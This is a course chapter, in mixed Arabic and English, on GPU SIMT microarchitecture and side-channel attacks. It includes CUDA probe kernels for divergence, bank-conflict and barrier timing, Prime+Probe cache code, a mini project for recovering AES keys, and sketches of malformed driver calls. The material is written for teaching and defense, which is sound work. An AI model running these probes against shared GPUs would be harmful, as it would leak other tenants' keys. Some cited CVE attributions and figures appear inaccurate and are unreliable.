Chapter 19 GPU SIMT Microarchitecture
أهداف الفصل
MIMD وSIMD و ازاي يختلف عنSIMT execution model فهم.1
masking وdivergence problem وwarp scheduler تحليل.2
leak access patterns لـmemory coalescing side-channels استغالل.3
timing oracle كـshared memory bank conflicts فهم.4
GPU-specific vulnerabilities: page table walks، TLB، cache timing تحليل.5
synchronization attacks وkernel launch overhead فهم.6
تقسيمة الموضوعات
1. GPU vs CPU: Execution Model Fundamentals
CPU Philosophy:
Latency-optimized
- Big caches (MB)
- Out-of-order execution
- Branch prediction
- Few powerful cores (4-64)
Goal: minimize latency of single thread
GPU Philosophy:
Throughput-optimized
- Small caches (KB per SM)
- In-order execution (mostly)
- NO branch prediction
- Thousands of threads (10K-100K)
Goal: maximize throughput via massive parallelism
Security Implication:
CPU: complex microarchitecture = Spectre/Meltdown
GPU: simpler, but massive shared resources = contention side-channels
The Parallelism Pyramid:
SISD: Single Instruction, Single Data (scalar CPU)
SIMD: Single Instruction, Multiple Data (SSE/AVX)
SIMT: Single Instruction, Multiple Threads (GPU)
MIMD: Multiple Instruction, Multiple Data (multi-core)
SIMT = SIMD + Multi-threading:
SIMD (AVX-512):
for (int i = 0; i < 16; i++) {
result[i] = a[i] + b[i]; // 16 operations in 1 instruction
}
SIMT (CUDA):
__global__ void add(float *a, float *b, float *result) {
int i = threadIdx.x; // Each thread has unique ID
result[i] = a[i] + b[i];
}
// Launch 1024 threads (not 16!)
// Hardware groups threads into warps (32 threads)
2. SIMT Execution: Warps & Thread Blocks
Thread Hierarchy:
Grid (entire kernel launch)
↓
Thread Blocks (up to 1024 threads per block)
↓
Warps (32 threads - hardware scheduling unit)
↓
Individual Threads
Example: 1024 threads
Grid: 1024 threads
Thread Block 0: threads 0-511
Thread Block 1: threads 512-1023
Warp 0: threads 0-31
Warp 1: threads 32-63
...
Warp 31: threads 992-1023
Warp Execution:
All 32 threads in warp execute SAME instruction
- Same PC (program counter)
- Different data (different registers)
Example:
Instruction: ADD R1, R2, R3
Thread 0: R1[0] = R2[0] + R3[0]
Thread 1: R1[1] = R2[1] + R3[1]
...
Thread 31: R1[31] = R2[31] + R3[31]
All execute in LOCKSTEP (1 cycle)
Hardware View: Streaming Multiprocessor (SM)
SM (NVIDIA Ampere):
- 64 CUDA cores (FP32 ALUs)
- 4 warp schedulers
- 128KB register file
- 64KB shared memory
- 128KB L1 cache
- Warp scheduler picks 4 warps to issue per cycle
Security Note:
Warp scheduling = shared resource
Warp execution timing = observable
Warp divergence = massive timing leak
3. Control Flow Divergence - مشكلة الـGPU األساسية
The Problem:
__global__ void kernel(int *data, int *output) {
int tid = threadIdx.x;
if (data[tid] > 100) { // Branch!
output[tid] = data[tid] * 2; // Path A
} else {
output[tid] = data[tid] + 1; // Path B
}
}
If all threads take same path: no problem
Threads 0-31: all data[tid] > 100
→ All take Path A
→ 1 warp execution (efficient!)
If threads diverge: DISASTER
Threads 0-15: data[tid] > 100 (Path A)
Threads 16-31: data[tid] <= 100 (Path B)
Hardware executes:
1. Execute Path A with threads 0-15 ACTIVE, 16-31 MASKED
2. Execute Path B with threads 0-15 MASKED, 16-31 ACTIVE
→ 2 warp executions (50% efficiency!)
Masking Implementation:
Active Mask (32-bit): 1 = active, 0 = masked
Path A execution:
Active Mask = 0x0000FFFF (threads 0-15)
Instruction: MUL R1, R2, 2
- Threads 0-15: execute MUL
- Threads 16-31: NOP (masked, but consume cycles!)
Path B execution:
Active Mask = 0xFFFF0000 (threads 16-31)
Instruction: ADD R1, R2, 1
- Threads 0-15: NOP
- Threads 16-31: execute ADD
Performance Impact:
Best case (no divergence): 1 warp = 1 cycle
Worst case (all threads diverge): 32 warps = 32 cycles
→ 32× slowdown!
Divergence Side-Channel Attack:
// Victim kernel (cryptographic operation)
__global__ void aes_encrypt(uint8_t *key, uint8_t *plaintext) {
int tid = threadIdx.x;
uint8_t k = key[tid % 16];
if (k & 0x01) { // Secret-dependent branch!
// Path A: ~10 instructions
sbox_lookup_even(plaintext[tid]);
} else {
// Path B: ~10 instructions
sbox_lookup_odd(plaintext[tid]);
}
}
// Attacker kernel (co-scheduled on same SM)
__global__ void attacker_probe() {
uint64_t start = clock64();
// Dummy computation (1 warp, no divergence)
for (int i = 0; i < 1000; i++) {
volatile int x = i * 2;
}
uint64_t end = clock64();
uint64_t latency = end - start;
// If victim has divergence → attacker delayed (SM busy)
// If no divergence → attacker fast
// → Leak victim's key bits!
}
Real Attack: CVE-2018-4437 (Apple GPU)
Divergence timing leaks AES key
Reconstruct key after ~1000 encryptions
4. Warp Scheduling & Occupancy
SM Resources:
NVIDIA A100 SM:
- 64 FP32 CUDA cores
- 65536 registers (32-bit each)
- 164KB shared memory
- Max 64 warps resident
- Max 2048 threads resident
Occupancy Calculation:
Example kernel:
- 128 threads per block
- 64 registers per thread
- 16KB shared memory per block
Register limit:
65536 registers / 64 registers per thread = 1024 threads max
→ 1024 / 128 = 8 blocks max
Shared memory limit:
164KB / 16KB per block = 10 blocks max
Actual: min(8, 10) = 8 blocks
→ 8 blocks × 128 threads = 1024 threads
→ Occupancy = 1024 / 2048 = 50%
Low Occupancy = Security Leak:
Attacker strategy:
1. Launch kernel with high register usage (low occupancy)
2. Co-schedule victim kernel
3. If victim doesn't launch → SM full
4. If victim launches → SM had space
5. Infer victim's resource usage → leak kernel config
Warp Scheduler Policies:
Round-Robin (NVIDIA default):
- Cycle through ready warps
- Fair, but no QoS
Greedy-Then-Oldest (GTO):
- Prioritize oldest warp
- Better cache locality
- But: unfair (newer warps starved)
Two-Level (TL):
- Group warps into fetch groups
- Round-robin between groups
- GTO within group
Scheduler Side-Channel:
// Attacker measures warp scheduling order
__global__ void attacker_probe() {
// Record timestamp when this warp runs
uint64_t timestamp = clock64();
atomicAdd(&global_timestamps[warpId], timestamp);
}
// Analysis:
// If victim warp scheduled before attacker → higher priority
// If attacker scheduled first → victim blocked/not ready
// → Infer victim's warp state (ready/blocked)
5. Memory System: Coalescing & Bank Conflicts
Global Memory Access:
Warp issues load: 32 threads, 32 addresses
Best case: addresses are COALESCED (contiguous)
→ 1 memory transaction (128 bytes)
Worst case: addresses are SCATTERED
→ 32 memory transactions (4096 bytes)
→ 32× bandwidth waste!
Coalesced Access:
__global__ void coalesced(float *data) {
int tid = threadIdx.x;
float val = data[tid]; // Thread i reads address i
}
Memory access:
Thread 0: addr 0x1000
Thread 1: addr 0x1004
...
Thread 31: addr 0x107C
→ All in same 128-byte cache line
→ 1 transaction
Uncoalesced Access:
__global__ void uncoalesced(float *data) {
int tid = threadIdx.x;
float val = data[tid * 1024]; // Stride = 1024
}
Memory access:
Thread 0: addr 0x1000
Thread 1: addr 0x1400 (1KB away!)
...
→ 32 different cache lines
→ 32 transactions
Coalescing Side-Channel:
Observation: Coalesced access = fast, Uncoalesced = slow
Attack:
1. Victim accesses array with secret-dependent stride
stride = (secret_bit == 1) ? 4 : 1024
2. Attacker measures victim's memory bandwidth
3. High bandwidth → stride=4 (coalesced) → secret_bit=1
4. Low bandwidth → stride=1024 (uncoalesced) → secret_bit=0
Shared Memory Bank Conflicts:
Shared Memory: 64KB, divided into 32 banks
Bank_ID = (address / 4) % 32
Conflict-free access:
Thread i accesses bank i
→ All 32 threads access different banks
→ 1 cycle
Bank conflict:
Threads 0 and 16 both access bank 0
→ Serialized: 2 cycles
Worst case: All threads access same bank
→ 32 cycles!
Example:
__shared__ float shared_data[1024];
// Conflict-free:
int tid = threadIdx.x;
float val = shared_data[tid]; // Each thread → different bank
// Bank conflict:
float val2 = shared_data[tid * 32]; // All threads → same bank!
Bank Conflict Side-Channel:
// Victim kernel
__global__ void victim(uint8_t *secret) {
__shared__ float shmem[256];
int tid = threadIdx.x;
// Secret-dependent access pattern
int index = (secret[tid] & 0x1F) * 32; // Bank conflict if secret
odd
float val = shmem[index];
}
// Attacker probes shared memory latency
__global__ void attacker() {
__shared__ float dummy[256];
uint64_t start = clock64();
volatile float x = dummy[threadIdx.x]; // Conflict-free
uint64_t end = clock64();
// If victim has conflicts → shared memory busy → attacker delayed
}
6. Cache Hierarchy & Timing Attacks
GPU Cache Hierarchy:
Per-SM:
- L1 Data Cache: 128KB (Ampere)
- Shared Memory: 64KB-164KB (configurable partition)
- Texture Cache: read-only, optimized for 2D locality
Global:
- L2 Cache: 40MB (A100)
- HBM Memory: 40-80GB (high bandwidth)
L1 Cache = Timing Oracle:
Attack: Prime+Probe on GPU L1
1. Attacker fills L1 with known data (prime)
2. Victim executes (evicts some lines)
3. Attacker probes L1 (measures access time)
4. Slow access → evicted → victim accessed this line
GPU-Specific Challenge:
CPU Prime+Probe: clflush instruction
GPU: NO explicit cache flush instruction!
Workaround:
- Allocate large array (> L1 size)
- Access entire array sequentially
- Evicts all L1 lines (flush by capacity)
Implementation:
#define L1_SIZE (128 * 1024) // 128KB
#define LINE_SIZE 128
#define NUM_LINES (L1_SIZE / LINE_SIZE)
__global__ void prime_l1(uint8_t *probe_array) {
int tid = threadIdx.x + blockIdx.x * blockDim.x;
// Prime: fill L1 with probe_array
for (int i = 0; i < NUM_LINES; i++) {
volatile uint8_t x = probe_array[i * LINE_SIZE];
}
}
__global__ void probe_l1(uint8_t *probe_array, uint64_t *timings) {
int tid = threadIdx.x;
// Probe: measure access time
for (int i = 0; i < NUM_LINES; i++) {
uint64_t start = clock64();
volatile uint8_t x = probe_array[i * LINE_SIZE];
uint64_t end = clock64();
timings[i] = end - start;
}
}
// Analysis:
// If timings[i] > threshold → cache miss → victim accessed line i
Real Attack: GPU-based AES Key Recovery
Target: AES T-table lookups
Prime+Probe on L1
Leak table indices → recover key
Success rate: 95% after 10K encryptions
7. TLB & Page Table Side-Channels
GPU TLB:
Per-SM TLB: ~16-64 entries (small!)
L2 TLB (global): 512-1024 entries
Why so small?
- GPUs have MASSIVE address spaces (100K threads)
- TLB thrashing is common
TLB Thrashing Attack:
// Attacker evicts victim's TLB entries
__global__ void evict_tlb(uint64_t *large_array) {
int tid = threadIdx.x;
// Access many different pages
for (int i = 0; i < 1024; i++) {
volatile uint64_t x = large_array[i * 4096 / 8]; // 1 page per
iteration
}
}
// Victim experiences TLB misses
__global__ void victim() {
// Every access now requires page table walk
// → 100-200 cycle penalty
}
Page Table Walk Latency:
TLB hit: ~1 cycle
TLB miss → Page table walk:
- 4-level page table (x86-64 style)
- 4 memory accesses
- ~100-200 cycles
Attacker measures victim's overall latency
→ High latency = TLB thrashing
→ Infer victim's memory access pattern
Unified Memory Side-Channel:
NVIDIA Unified Memory: CPU & GPU share virtual address space
Page migration: pages migrate between CPU & GPU memory
Attack:
1. Victim accesses page on CPU
2. Page migrates to GPU (on-demand)
3. Attacker measures page fault frequency
4. High page faults → victim accessing many unique pages
5. Low page faults → victim re-using pages
→ Leak working set size
8. Synchronization Primitives & Race Conditions
__syncthreads() Barrier:
__global__ void kernel() {
__shared__ float shmem[256];
// Phase 1: each thread writes
shmem[threadIdx.x] = compute();
__syncthreads(); // All threads wait here
// Phase 2: each thread reads
float val = shmem[(threadIdx.x + 1) % 256];
}
Implementation:
Hardware barrier:
- Each thread sets "arrived" bit
- Warp scheduler stalls until all bits set
- Then releases all threads
Timing:
- Fast if all threads arrive together
- Slow if threads straggle (divergence)
Barrier Timing Side-Channel:
// Victim kernel (secret-dependent work)
__global__ void victim(uint8_t *secret) {
if (secret[threadIdx.x]) {
// Heavy computation (100 cycles)
expensive_function();
}
__syncthreads(); // Barrier
// More work...
}
// Attacker in same block
__global__ void attacker() {
uint64_t start = clock64();
__syncthreads(); // Same barrier!
uint64_t end = clock64();
// If victim threads diverge (secret-dependent) → longer barrier
wait
// → Leak secret via barrier timing
}
Atomic Operations:
__global__ void atomic_inc(int *counter) {
atomicAdd(counter, 1);
}
Serialization Problem:
All 32 threads in warp try to atomicAdd same location
→ Serialized: 32 cycles
→ Creates contention bottleneck
Atomic Contention Side-Channel:
Victim uses atomics for secret-dependent histogram:
for each element:
bin = hash(element, secret_key)
atomicAdd(&histogram[bin], 1)
Attacker measures atomic throughput:
- High contention → many threads hit same bins → reveals key
9. Kernel Launch Overhead & Timing
Launch Latency:
CPU launches kernel:
1. Driver prepares launch parameters (~5 μs)
2. Copy parameters to GPU (~1 μs)
3. GPU scheduler assigns SMs (~2 μs)
4. Kernel starts execution
Total: ~8-10 μs overhead (before any useful work!)
Inference Attack:
// Attacker measures victim's kernel launch rate
void monitor_launches() {
while (1) {
uint64_t start = clock();
// Wait for GPU idle
cudaDeviceSynchronize();
uint64_t end = clock();
printf("Time between kernels: %lu us\n", end - start);
}
}
// If victim launches kernels at secret-dependent rate:
// → Leak secret via launch timing
Persistent Kernels (Defense):
// Instead of many small kernel launches:
// → 1 persistent kernel that loops internally
__global__ void persistent_kernel(WorkQueue *queue) {
while (1) {
Work work = dequeue(queue);
if (work == NULL) break;
process_work(work);
}
}
// Launch once, feed work via queue
// → No launch overhead per task
// → Harder to infer task boundaries
10. Multi-Tenancy & Isolation
GPU Virtualization:
Modern GPUs (A100, H100):
- Multi-Instance GPU (MIG): hardware partitioning
- Each instance gets dedicated SMs, memory, caches
- Isolated execution
Older GPUs:
- Spatial sharing: different kernels on different SMs
- Temporal sharing: time-slice GPU
- NO isolation!
Spatial Sharing Attack:
Attacker kernel on SM 0-3
Victim kernel on SM 4-7
Attack:
1. Attacker saturates L2 cache (shared!)
2. Victim's cache lines evicted
3. Victim performance degrades
4. Attacker measures victim's slowdown
→ Infer victim's memory access pattern
Temporal Sharing Attack:
GPU scheduler: preempts victim kernel, runs attacker
- Victim's state: registers, shared memory, L1 cache
- Lazy state save: GPU doesn't clear state (optimization!)
Attack:
1. Victim kernel runs (leaves data in registers)
2. GPU preempts victim
3. Attacker kernel runs on same SM
4. Attacker reads registers (might contain victim data!)
Real Vulnerability: CVE-2019-5700 (AMD GPU)
Incomplete context switch:
- Register file not cleared
- Attacker reads victim's registers
- Leak: crypto keys, passwords
Mitigation:
Scrubbing: zero all registers on context switch
Cost: 100-200 cycles per SM
→ 5-10% performance overhead
11. CUDA Driver & Runtime Attacks
Driver Privileges:
CUDA Driver: kernel mode (Ring 0)
User application: user mode (Ring 3)
Syscalls:
- cuLaunchKernel()
- cuMemcpyHtoD()
- cuMemAlloc()
Each syscall = potential vulnerability
Attack Surface:
// Malformed kernel launch
cuLaunchKernel(
kernel,
1, // gridDim
1, // blockDim
0, // sharedMem
0, // stream
(void **)0xDEADBEEF, // kernelParams (invalid pointer!)
NULL
);
// If driver doesn't validate:
// → Kernel dereferences 0xDEADBEEF
// → GPU page fault
// → Driver might crash / leak info
Driver Buffer Overflow:
// Copy large buffer to GPU
char large_buffer[1024 * 1024 * 1024]; // 1GB
cuMemcpyHtoD(gpu_ptr, large_buffer, sizeof(large_buffer));
// If driver allocates small buffer internally:
// → Buffer overflow in kernel driver
// → Potential privilege escalation
Real Exploits:
CVE-2021-1056 (NVIDIA): driver buffer overflow → SYSTEM
CVE-2020-5963 (NVIDIA): driver UAF → kernel code execution
12. Constant Memory & Read-Only Cache Exploitation
Constant Memory:
64KB per kernel
Cached in dedicated constant cache (64KB per SM)
Read-only
Optimized for broadcast (all threads read same value)
Timing Leak:
__constant__ uint8_t aes_key[16]; // Secret key
__global__ void encrypt(uint8_t *plaintext) {
int tid = threadIdx.x;
// All threads read same key byte (broadcast)
uint8_t k = aes_key[tid % 16];
// Use k...
}
Attack:
Attacker probes constant cache:
1. Fill constant cache with known data
2. Victim runs (loads key into cache)
3. Attacker measures constant cache state
(via timing of constant memory access)
4. Infer which cache lines were evicted
→ Leak key bytes
Read-Only Cache (Texture Cache):
Separate from L1
Optimized for spatial locality (2D arrays)
Used for read-only data
__global__ void kernel(float *input) {
float val = __ldg(&input[idx]); // Load via texture cache
}
Same Attack:
Prime+Probe on texture cache
→ Leak victim's read patterns
13. Performance Counter Side-Channels
NVIDIA Profiler (nvprof):
$ nvprof --metrics all ./victim_program
==12345== Profiling result:
Kernel: aes_encrypt
l1_cache_global_hit_rate: 87.3%
shared_mem_bank_conflicts: 1234
warp_execution_efficiency: 45.2%
achieved_occupancy: 0.67
Attack Scenario:
Cloud GPU:
- Multiple users share GPU
- Each can run nvprof
- Counters are GLOBAL (not per-user!)
Attack:
1. Attacker runs: nvprof --metrics dram_read_bytes
2. Victim encrypts data
3. Attacker reads counter: +128KB
→ Victim read 128KB from DRAM
→ Infer data size / operation type
Mitigation:
GPU driver: restrict perf counter access
- Require root/admin privileges
- Per-process counters (hardware support needed)
14. Side-Channel Resistant GPU Programming
Constant-Time GPU Code:
// BAD: secret-dependent branching
__global__ void bad_crypto(uint8_t *key) {
if (key[threadIdx.x] & 0x01) {
path_A();
} else {
path_B();
}
}
// GOOD: branchless (masking)
__global__ void good_crypto(uint8_t *key) {
uint8_t mask = (key[threadIdx.x] & 0x01) ? 0xFF : 0x00;
uint8_t result_A = path_A_compute();
uint8_t result_B = path_B_compute();
uint8_t result = (result_A & mask) | (result_B & ~mask);
// Both paths execute, no divergence timing leak
}
Constant-Time Memory Access:
// BAD: secret-dependent stride
__global__ void bad_access(uint8_t *secret, float *data) {
int stride = secret[threadIdx.x] * 1024;
float val = data[stride]; // Coalescing depends on secret!
}
// GOOD: fixed stride, shuffle result
__global__ void good_access(uint8_t *secret, float *data) {
// Always coalesced access
float val = data[threadIdx.x];
// Shuffle locally (cheap)
int idx = secret[threadIdx.x];
__shared__ float shmem[256];
shmem[threadIdx.x] = val;
__syncthreads();
float result = shmem[idx]; // Secret-dependent, but local
}
Noise Injection:
// Add random delays to hide timing
__global__ void noisy_crypto(uint8_t *key) {
// Random delay (0-100 cycles)
int delay = random() % 100;
for (int i = 0; i < delay; i++) {
__threadfence(); // Dummy work
}
// Actual crypto work
compute(key);
}
Cost: 10-30% performance overhead
ترتيب المذاكرة
1. GPU vs CPU (Section 1): فهم الفلسفة األساسية
2. SIMT & Warps (Section 2): execution model
3. Divergence (Section 3): المشكلة الرئيسية فيGPU
4. Warp Scheduling (Section 4): ازاي الـSM يديرwarps
5. Memory Coalescing (Section 5): memory access patterns
6. Cache Timing (Section 6): Prime+Probe علىGPU
7. TLB Attacks (Section 7): page table side-channels
8. Synchronization (Section 8): barriers وatomics
9. Kernel Launch (Section 9): overhead وtiming
10. Multi-Tenancy (Section 10): isolation problems
11. Driver Attacks (Section 11): privilege escalation
12. Constant Memory (Section 12): specialized caches
13. Perf Counters (Section 13): monitoring attacks
14. Defenses (Section 14): constant-time programming
)!أهم المصطلحات (حفظ
1. SIMT: Single Instruction, Multiple Threads
2. Warp: 32 threads executing in lockstep
3. Streaming Multiprocessor (SM): GPU core cluster
4. Divergence: threads in warp take different paths
5. Active Mask: bitmask showing which threads are active
6. Coalescing: merging memory requests into single transaction
7. Bank Conflict: multiple threads access same shared memory bank
8. Occupancy: ratio of active warps to max warps per SM
9. Shared Memory: fast on-chip memory shared within thread block
10. Thread Block: group of threads (up to 1024)
11. Grid: collection of thread blocks
12. CUDA Core: scalar FP32 ALU
13. Texture Cache: read-only cache for spatial locality
14. Constant Memory: 64KB read-only broadcast memory
15. Warp Scheduler: hardware that picks warps to execute
16. Register Spilling: registers overflow to local memory
17. L1 Cache: per-SM cache (128KB)
18. L2 Cache: global cache (40MB)
19. HBM: High Bandwidth Memory
20. MIG: Multi-Instance GPU (hardware partitioning)
أسئلة مراجعة/ تمارين
كبير؟SIMD مش مجردGPU ؟ ليهSIMT وSIMD إيه الفرق بين.1
ليه هو مشكلة أداء ضخمة؟.warp divergence اشرح.2
؟execution هيحصل إيه في،path B تاخد16 وpath A تاخدthreads 16 وif-else فيهkernel لو عندك.3
يستغلده؟attacker ؟ إزايuncoalesced memory access وcoalesced إيه الفرق بين.4
إزاي تتجنبه؟.shared memory bank conflict اشرح.5
؟clflush instruction بدونGPU L1 cache علىPrime+Probe يعملattacker ازاي.6
؟security implication )؟ إيه الـentries 64-16( صغير جدًاGPU TLB ليه.7
() يسرب معلومات؟syncthreads__ إزاي.barrier timing side-channel attack اشرح.8
؟GPU multi-tenancy فيtemporal sharing وspatial sharing إيه الفرق بين.9
؟AMD GPU فيlazy context switching استغلCVE-2019-5700 ازاي.10
؟divergence timing leaks بدونconstant-time GPU code إزاي تكتب.11
؟shared GPU environments خطر فيperformance counters ليه.12
Mini Project: GPU Cache Timing Attack on AES
:الهدف
.leak AES T-table accesses لـGPU L1 cache علىPrime+Probe attack بناء
:المطلوب
Phase 1: Setup
NVIDIA GPU (GTX 1080 )أو أعلى
CUDA Toolkit installed
Victim AES implementation (T-table based)
Phase 2: Understand Victim
// Victim: AES T-table lookup (typical implementation)
__global__ void aes_encrypt(uint8_t *key, uint8_t *plaintext, uint8_t
*output) {
__shared__ uint32_t T0[256]; // T-tables in shared memory
__shared__ uint32_t T1[256];
// ... load T-tables ...
int tid = threadIdx.x;
uint8_t state[16];
// ... copy plaintext to state ...
// Round 1 (example)
uint8_t idx0 = state[0] ^ key[0];
uint32_t t0 = T0[idx0]; // Secret-dependent lookup!
// ... rest of AES ...
}
Phase 3: Build Prime Phase
#define L1_SIZE (128 * 1024)
#define LINE_SIZE 128
#define NUM_SETS (L1_SIZE / LINE_SIZE)
__global__ void prime_l1(uint8_t *probe_array) {
int tid = threadIdx.x;
// Fill L1 with probe_array
for (int set = 0; set < NUM_SETS; set++) {
volatile uint8_t x = probe_array[set * LINE_SIZE];
}
}
Phase 4: Run Victim (Target)
// Launch victim kernel
aes_encrypt<<<1, 32>>>(dev_key, dev_plaintext, dev_output);
cudaDeviceSynchronize();
Phase 5: Build Probe Phase
__global__ void probe_l1(uint8_t *probe_array, uint64_t *timings) {
int tid = threadIdx.x;
for (int set = 0; set < NUM_SETS; set++) {
uint64_t start = clock64();
volatile uint8_t x = probe_array[set * LINE_SIZE];
uint64_t end = clock64();
timings[set] = end - start;
}
}
Phase 6: Analysis
# Analyze timings to find evicted sets
threshold = mean(timings) + 2 * std(timings)
evicted_sets = [i for i, t in enumerate(timings) if t > threshold]
# Map evicted sets to T-table indices
# (requires knowing T-table address and L1 mapping function)
t_table_indices = map_sets_to_indices(evicted_sets)
# Repeat for many plaintexts
for plaintext in plaintexts:
run_attack(plaintext)
collect_t_table_indices()
# Statistical analysis: Differential Cache Analysis
# Correlate T-table indices with key bytes
key_bytes = recover_key_from_indices(all_indices, all_plaintexts)
Phase 7: Validation
# Test recovered key
recovered_key = bytes(key_bytes)
reference_ciphertext = reference_aes_encrypt(plaintext, actual_key)
test_ciphertext = reference_aes_encrypt(plaintext, recovered_key)
if test_ciphertext == reference_ciphertext:
print("SUCCESS: Key recovered!")
else:
print("FAIL: Key incorrect")
Expected Results:
Baseline (no attack): 100% AES correctness
After 1000 plaintexts: 30-40% key bytes recovered
After 10000 plaintexts: 95%+ key bytes recovered
Challenges:
L1 cache mapping function unknown (reverse engineer)
Noise منother SM activity (isolate using persistent kernels)
Timing measurement precision (use clock64(), not wall time)
Bonus:
Extend to Flush+Reload (if page deduplication available)
Measure detection rate vs false positive rate
Implement countermeasures (e.g., T-table in registers, not shared mem)
:ملحوظة
GPU cache timing, not weaponizing against production الهدف فهم.research-focused المشروع ده
.systems
Key Takeaway:
GPU SIMT = massive parallelism + simple microarchitecture. But: shared resources (SM,
caches, memory) = huge side-channel surface. Divergence, coalescing, banks, TLB - كلها
observable. Constant-time programming أصعب علىGPU منCPU.